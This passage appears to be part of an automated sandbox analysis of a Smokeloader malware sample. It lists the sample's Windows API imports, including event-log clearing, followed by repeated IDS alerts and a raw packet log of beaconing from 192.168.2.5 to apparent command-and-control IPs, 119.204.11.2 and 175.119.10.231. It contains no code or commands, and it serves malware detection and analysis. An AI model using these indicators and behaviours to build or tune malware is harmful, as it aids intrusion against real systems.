                              KERNEL32.dllGetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                              ADVAPI32.dllClearEventLogW
                              Language of compilation systemCountry where language is spokenMap
                              TurkishTurkey
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-12T20:07:29.848902+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549792119.204.11.280TCP
                              2024-10-12T20:07:31.374913+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549799119.204.11.280TCP
                              2024-10-12T20:07:32.891080+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549809119.204.11.280TCP
                              2024-10-12T20:07:34.426343+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549820119.204.11.280TCP
                              2024-10-12T20:07:35.946752+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549831119.204.11.280TCP
                              2024-10-12T20:07:37.459108+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549841119.204.11.280TCP
                              2024-10-12T20:07:38.958859+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549849119.204.11.280TCP
                              2024-10-12T20:07:40.481991+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549861119.204.11.280TCP
                              2024-10-12T20:07:41.972367+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549870119.204.11.280TCP
                              2024-10-12T20:07:43.476100+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549881119.204.11.280TCP
                              2024-10-12T20:07:44.967534+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549892119.204.11.280TCP
                              2024-10-12T20:07:46.457451+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549903119.204.11.280TCP
                              2024-10-12T20:07:47.959801+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549914119.204.11.280TCP
                              2024-10-12T20:07:49.466916+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549925119.204.11.280TCP
                              2024-10-12T20:07:50.949811+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549932119.204.11.280TCP
                              2024-10-12T20:07:52.436567+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549943119.204.11.280TCP
                              2024-10-12T20:07:53.920305+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549954119.204.11.280TCP
                              2024-10-12T20:07:55.414257+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549964119.204.11.280TCP
                              2024-10-12T20:07:56.903613+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549972119.204.11.280TCP
                              2024-10-12T20:07:58.598972+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549983119.204.11.280TCP
                              2024-10-12T20:08:00.089880+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549993119.204.11.280TCP
                              2024-10-12T20:08:01.634818+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549998119.204.11.280TCP
                              2024-10-12T20:08:03.281168+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.549999119.204.11.280TCP
                              2024-10-12T20:08:04.804921+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550000119.204.11.280TCP
                              2024-10-12T20:08:08.140704+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550002119.204.11.280TCP
                              2024-10-12T20:08:09.781553+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550003119.204.11.280TCP
                              2024-10-12T20:08:11.264790+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550004119.204.11.280TCP
                              2024-10-12T20:08:12.807847+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550005119.204.11.280TCP
                              2024-10-12T20:08:15.107333+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550006119.204.11.280TCP
                              2024-10-12T20:08:16.639263+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550007119.204.11.280TCP
                              2024-10-12T20:08:18.120800+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550008119.204.11.280TCP
                              2024-10-12T20:08:19.640221+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550009119.204.11.280TCP
                              2024-10-12T20:08:21.135939+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550010119.204.11.280TCP
                              2024-10-12T20:08:22.613113+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550011119.204.11.280TCP
                              2024-10-12T20:08:23.941825+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550012119.204.11.280TCP
                              2024-10-12T20:08:25.476955+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550013119.204.11.280TCP
                              2024-10-12T20:09:34.491548+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550014119.204.11.280TCP
                              2024-10-12T20:09:39.836652+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550015119.204.11.280TCP
                              2024-10-12T20:09:45.207552+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550016119.204.11.280TCP
                              2024-10-12T20:09:51.304176+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550017119.204.11.280TCP
                              2024-10-12T20:09:57.203146+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.550018119.204.11.280TCP
                              2024-10-12T20:10:07.063551+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560089175.119.10.23180TCP
                              2024-10-12T20:10:11.870177+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560090175.119.10.23180TCP
                              2024-10-12T20:10:17.910339+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560091175.119.10.23180TCP
                              2024-10-12T20:10:23.702222+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560092175.119.10.23180TCP
                              2024-10-12T20:10:30.353244+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560093175.119.10.23180TCP
                              2024-10-12T20:10:36.229845+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560094175.119.10.23180TCP
                              2024-10-12T20:10:41.630767+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560095175.119.10.23180TCP
                              2024-10-12T20:10:46.361537+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560096175.119.10.23180TCP
                              2024-10-12T20:10:51.684157+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560097175.119.10.23180TCP
                              2024-10-12T20:10:56.903490+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560098175.119.10.23180TCP
                              2024-10-12T20:11:04.022959+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.560099175.119.10.23180TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 12, 2024 20:07:28.075416088 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:28.080332041 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:28.084074974 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:28.084242105 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:28.084254980 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:28.089385986 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:28.089456081 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.848795891 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.848814964 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.848819017 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.848901987 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.849989891 CEST4979280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.855135918 CEST8049792119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.856249094 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.861108065 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.861186028 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.861692905 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.861723900 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:29.866565943 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:29.866575003 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.374404907 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.374792099 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.374912977 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.375153065 CEST4979980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.378616095 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.379995108 CEST8049799119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.383480072 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.385885000 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.386056900 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.386091948 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:31.390966892 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:31.391489029 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.890898943 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.890948057 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.891079903 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.891319990 CEST4980980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.894352913 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.896089077 CEST8049809119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.899163961 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.899247885 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.899426937 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.899456024 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:32.904236078 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:32.904414892 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.426244020 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.426287889 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.426342964 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.426495075 CEST4982080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.429492950 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.431477070 CEST8049820119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.434863091 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.434946060 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.435060024 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.435089111 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:34.440107107 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:34.440135956 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.946641922 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.946676016 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.946752071 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.946875095 CEST4983180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.949459076 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.951684952 CEST8049831119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.954246998 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.955926895 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.956039906 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.956039906 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:35.960818052 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:35.961082935 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.458920956 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.459052086 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.459108114 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.459192038 CEST4984180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.462085962 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.464039087 CEST8049841119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.466983080 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.467063904 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.467190981 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.467225075 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:37.471970081 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:37.472177982 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.958609104 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.958801985 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.958858967 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.958924055 CEST4984980192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.961695910 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.963689089 CEST8049849119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.966685057 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.966808081 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.966912031 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.967140913 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:38.971641064 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:38.971852064 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.481789112 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.481942892 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.481991053 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.483067989 CEST4986180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.485280037 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.487932920 CEST8049861119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.490185976 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.490252018 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.490367889 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.490377903 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:40.495178938 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:40.495187044 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.972019911 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.972307920 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.972367048 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.972440958 CEST4987080192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.976982117 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.977267981 CEST8049870119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.981909037 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.982019901 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.982127905 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.982155085 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:41.986932039 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:41.987041950 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.473678112 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.474653006 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.476099968 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.476146936 CEST4988180192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.478612900 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.481029034 CEST8049881119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.483577967 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.483639956 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.483773947 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.483793020 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:43.488534927 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:43.488544941 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.967206001 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.967457056 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.967534065 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.967576981 CEST4989280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.969868898 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.972446918 CEST8049892119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.974981070 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.975231886 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.975231886 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.975404024 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:44.980185032 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:44.980211020 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.457277060 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.457314014 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.457451105 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.457617998 CEST4990380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.460134983 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.462490082 CEST8049903119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.465078115 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.465184927 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.465318918 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.465373039 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:46.470110893 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:46.470233917 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.959476948 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.959691048 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.959800959 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.959800959 CEST4991480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.962589025 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.964683056 CEST8049914119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.967750072 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.967833996 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.967969894 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.968004942 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:47.972826958 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:47.972942114 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.466757059 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.466795921 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.466916084 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.467063904 CEST4992580192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.469439983 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.471947908 CEST8049925119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.474510908 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.474600077 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.474919081 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.474951029 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:49.479720116 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:49.479937077 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.949657917 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.949701071 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.949810982 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.949930906 CEST4993280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.952074051 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.954751968 CEST8049932119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.956986904 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.957077980 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.957179070 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.957180023 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:50.962038040 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:50.962068081 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.436352968 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.436495066 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.436567068 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.436619043 CEST4994380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.439568996 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.441471100 CEST8049943119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.444452047 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.444534063 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.444674969 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.444685936 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:52.449487925 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:52.449601889 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.920020103 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.920252085 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.920305014 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.920347929 CEST4995480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.924154043 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.925143957 CEST8049954119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.929255009 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.929353952 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.929517984 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.929550886 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:53.934362888 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:53.934515953 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.414083958 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.414165974 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.414257050 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.414398909 CEST4996480192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.417716980 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.419969082 CEST8049964119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.422612906 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.423331022 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.423439026 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.423453093 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:55.428386927 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:55.428638935 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.903420925 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.903554916 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.903613091 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.903645992 CEST4997280192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.905852079 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.908566952 CEST8049972119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.910773993 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.910845041 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.910952091 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.910976887 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:56.915836096 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:56.916021109 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.598740101 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.598787069 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.598871946 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.598972082 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:58.599797010 CEST4998380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:58.602504969 CEST4999380192.168.2.5119.204.11.2
                              Oct 12, 2024 20:07:58.604635000 CEST8049983119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.607451916 CEST8049993119.204.11.2192.168.2.5
                              Oct 12, 2024 20:07:58.610280037 CEST4999380192.168.2.5119.204.11.2
